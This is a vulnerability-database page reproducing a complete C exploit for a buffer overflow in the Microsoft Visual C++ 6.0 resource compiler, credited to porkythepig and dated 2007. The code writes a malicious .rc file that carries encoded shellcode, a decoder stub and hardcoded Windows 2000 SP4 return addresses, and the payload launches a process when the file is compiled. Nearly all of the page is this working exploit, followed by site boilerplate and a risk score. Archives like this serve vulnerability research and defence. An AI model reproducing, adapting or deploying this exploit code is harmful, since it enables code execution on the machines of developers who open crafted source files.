Vulners
Lucene search
Microsoft Visual C++ - '.RC Resource Files' Local Buffer Overflow
//*****************
//
// Microsoft Visual C++ 6.0 SP6 resource compiler buffer overflow
// vulnerability .rc resource files exploit
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "memory.h"
#define STR01 "Microsoft Visual Studio 6.0 SP6 .rc PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 283
#define DEC_CODE 0xBC
#define DEC_CODE_OFFSET 0x2D
#define ENC_SIZE_OFFSET 0x3E
#define SHIFT 0x40
#define SHIFT_DEC_OFFSET 0x35
#define PROC_NAME_OFFSET 0x107
#define GETSTAR_OFFSET 0x11
#define CREPRO_OFFSET 0x6d
#define GETWINDIR_OFFSET 0x25
#define ESPSUB_OFFSET 0x08
#define FNAMSHIFT_OFFSET 0x02
typedef struct
{
unsigned int getStarInf;
unsigned int crePro;
unsigned int getWinDir;
unsigned int jmpEspPtr;
}ApiPtrs;
ApiPtrs osApiPtrs[2]=
{
0x7c4f49df,0x7c4fc0a0,0x7c4e9c00,0x782f28f7,
0x7c596b7a,0x7c595010,0x7c592d23,0x77e16280
};
unsigned char decoder[]=
{
0xeb,0x2a,0xeb,0x2a,0x8b,0xdc,0x81,0xc3,
0x40,0xff,0xff,0xff,0x8b,0xcb,0x33,0xd2,
0x8a,0x21,0x80,0xfc,0xbc,0x75,0xe9,0x41,
0x8a,0x21,0x80,0xec,0x40,0x88,0x23,0x43,
0x41,0x42,0x33,0xc0,0xb0,0x99,0x3b,0xd0,
0x7c,0xe6,0xeb,0xd6,0xeb,0xef
};
unsigned char shlCode[]=
{
0x83,0xc4,0x0c,0x8b,0xc4,0x8b,0xe6,0x90,
0x90,0x90,0x50,0x66,0x2d,0x10,0x20,0x50,
0xb8,0x7a,0x6b,0x59,0x7c,0xff,0xd0,0x5b,
0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,
0xeb,0x10,0x30,0x53,0xb8,0x23,0x2d,0x59,
0x7c,0xff,0xd0,0x58,0x50,0x66,0x2d,0x10,
0x30,0x32,0xdb,0x38,0x18,0x74,0x03,0x40,
0xeb,0xf9,0x5b,0x53,0xb2,0xff,0xb1,0x5c,
0x88,0x08,0x40,0x38,0x13,0x74,0x08,0x8a,
0x0b,0x88,0x08,0x43,0x40,0xeb,0xf4,0xb2,
0x00,0x88,0x10,0x58,0x50,0x66,0x2d,0x10,
0x30,0x8b,0xd0,0x58,0x50,0x66,0x2d,0x10,
0x20,0x50,0x33,0xc9,0x51,0x51,0x51,0x51,
0x51,0x51,0x51,0x52,0xb8,0x10,0x50,0x59,
0x7c,0xff,0xd0,0xeb,0xfe
};
unsigned char jmp1Seq[]=
{
0xe9,0x2d,0xff,0xff,0xff
};
unsigned char jmp0Seq[]=
{
0xe9,0x28,0xff,0xff,0xff
};
unsigned char espSub0=0x4e;
unsigned char espSub1=0x5c;
unsigned char fnamShift0=0x0e;
unsigned char fnamShift1=0x1c;
unsigned char retOffset1=0xe7;
unsigned char retOffset0=0xf5;
unsigned char jmp1Offset=0xeb;
unsigned char jmp0Offset=0xf0;
unsigned short back3=0xf5eb;
unsigned char back3Offs=0xf9;
unsigned char buf0[EXPL_SIZE];
char *outName;
int osId;
int defProc;
unsigned char espSub;
unsigned char fnamShift;
unsigned char *jmpSeq;
unsigned char retOffset;
unsigned char jmpOffset;
int Encode(unsigned char *destBuf, unsigned char *srcBuf, int srcSize)
{
int cnt,c1;
for(cnt=0,c1=0;cnt<srcSize;cnt++)
{
if((srcBuf[cnt]<0x20)||(srcBuf[cnt]==0x22)||(srcBuf[cnt]==0x2f))
{
destBuf[c1]=DEC_CODE;
destBuf[c1+1]=srcBuf[cnt]+SHIFT;
c1+=2;
}
else
{
destBuf[c1]=srcBuf[cnt];
c1++;
}
}
return c1;
}
void CompileBuffer()
{
int ptr=0;
int encSiz;
memset(buf0,'1',EXPL_SIZE);
ptr+=sprintf((char*)buf0,"1 TYPELIB MOVEABLE PURE \"");
decoder[ESPSUB_OFFSET]=espSub;
memcpy(buf0+ptr,decoder,sizeof(decoder));
buf0[DEC_CODE_OFFSET]=DEC_CODE;
buf0[SHIFT_DEC_OFFSET]=SHIFT;
ptr+=sizeof(decoder);
*((unsigned int*)(shlCode+GETSTAR_OFFSET))=osApiPtrs[osId].getStarInf;
*((unsigned int*)(shlCode+CREPRO_OFFSET))=osApiPtrs[osId].crePro;
*((unsigned int*)(shlCode+GETWINDIR_OFFSET))=osApiPtrs[osId].getWinDir;
shlCode[FNAMSHIFT_OFFSET]=fnamShift;
encSiz=Encode(buf0+ptr,shlCode,sizeof(shlCode));
buf0[ENC_SIZE_OFFSET]=sizeof(shlCode);
sprintf((char*)(buf0+PROC_NAME_OFFSET),"%s\xff",DEF_SPAWNED_PROCESS);
buf0[PROC_NAME_OFFSET+sizeof(DEF_SPAWNED_PROCESS)]=0xff;
*((unsigned int*)(buf0+retOffset))=osApiPtrs[osId].jmpEspPtr;
memcpy(buf0+jmpOffset,jmpSeq,5);
if(osId==0)
{
*((unsigned short*)(buf0+back3Offs))=back3;
}
sprintf((char*)(buf0+EXPL_SIZE-3),"\"\r\n");
printf("Exploit buffer compiled\n");
}
void WriteBuffer()
{
FILE *o;
o=fopen(outName,"wb");
if(o==NULL)
{
printf("Cannot open file for writing\n");
exit(0);
}
fprintf(o,"//**********\r\n// %s\r\n//**********\r\n\r\n",STR01);
fwrite(buf0,EXPL_SIZE,1,o);
fclose(o);
printf("Output .rc file [ %s ] built successfully\n",outName);
}
void ProcessInput(int argc, char* argv[])
{
printf("\nMicrosoft Visual Studio 6 .rc resource files exploit\n");
printf("Vulnerability found & exploit built by porkythepig\n");
if(argc<3)
{
printf("Syntax: exploit.exe os outName\n");
printf("[os] host OS, possible choices:\n");
printf(" 0 Windows 2000 SP4 English\n");
printf(" 1 Windows 2000 SP4 English all updates on day 11.01.2007\n");
printf("[outName] output .rc exploit file name\n");
exit(0);
}
osId=atol(argv[1]);
if((osId<0)||(osId>1))
{
exit(0);
}
if(osId==0)
{
espSub=espSub0;
fnamShift=fnamShift0;
jmpSeq=jmp0Seq;
jmpOffset=jmp0Offset;
retOffset=retOffset0;
}
else
{
espSub=espSub1;
fnamShift=fnamShift1;
jmpSeq=jmp1Seq;
jmpOffset=jmp1Offset;
retOffset=retOffset1;
}
outName=argv[2];
}
int main(int argc, char* argv[])
{
ProcessInput(argc,argv);
CompileBuffer();
WriteBuffer();
return 0;
}
// milw0rm.com [2007-01-22]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jan 2007 00:00Current
7High risk
Vulners AI Score7